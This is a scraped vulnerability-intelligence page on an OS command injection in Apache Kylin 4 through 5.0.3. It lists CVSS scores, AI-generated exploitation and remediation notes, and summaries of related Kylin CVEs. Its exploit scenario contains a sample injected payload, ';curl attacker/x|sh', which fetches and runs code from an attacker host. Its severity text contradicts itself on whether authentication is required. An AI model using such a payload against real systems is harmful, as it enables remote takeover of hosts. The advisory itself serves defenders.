GHSA-vv75-pcv7-p758
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Network-reachable API with low-complexity command injection, but submitting job/config parameters typically requires an authenticated operator, so PR:L rather than PR:N; full C/I/A impact from OS command execution.
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
5Description PRE-NVD
Articles & Coverage 1
AnalysisAI
OS command injection in Apache Kylin (versions 4 through 5.0.3) allows attackers to execute arbitrary operating-system commands by supplying malicious job configuration parameters that a backend API passes unsanitized to the OS command line. Because Kylin runs as a distributed analytics engine, successful exploitation yields full host compromise with the privileges of the Kylin service account. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires reachability to the Apache Kylin backend API that accepts job configuration parameters and the ability to supply or influence a job/build config value that is subsequently passed to the OS command line on a Kylin instance running an affected version (4 through 5.0.3). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor CVSS 3.1 base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating remote, low-complexity, unauthenticated exploitation with full host impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who can reach the Kylin backend API crafts a job/cube configuration parameter containing embedded shell metacharacters (for example appending ';curl attacker/x|sh'). When Kylin constructs the OS command line for that job, the injected commands execute on the host with the Kylin service account's privileges, giving the attacker code execution and a foothold in the analytics cluster. … |
| Remediation | Vendor-released patch: upgrade to Apache Kylin 5.0.4, which fixes the OS command injection; this is the primary and recommended remediation for all installations running versions 4 through 5.0.3. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, identify all systems running Apache Kylin versions 4.0-5.0.3 and assess network exposure; immediately isolate or air-gap affected systems if exposed to untrusted networks. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the
SQL injection in Apache Kylin (versions 4 through 5.0.3) allows attackers to inject arbitrary SQL through a backend API
Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request. Rated critic
Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configura
Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is f
Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then exe
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.
Session Fixation vulnerability in Apache Kylin.0.0 through 4.x. Rated critical severity (CVSS 9.1), this vulnerability i
In the fix for CVE-2022-24697, a blacklist is used to filter user input commands. Rated high severity (CVSS 8.8), this v
Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run m
Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Kylin. This issue affects Apache Kylin
Files or Directories Accessible to External Parties vulnerability in Apache Kylin. You are fine as long as the Kylin's
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-43664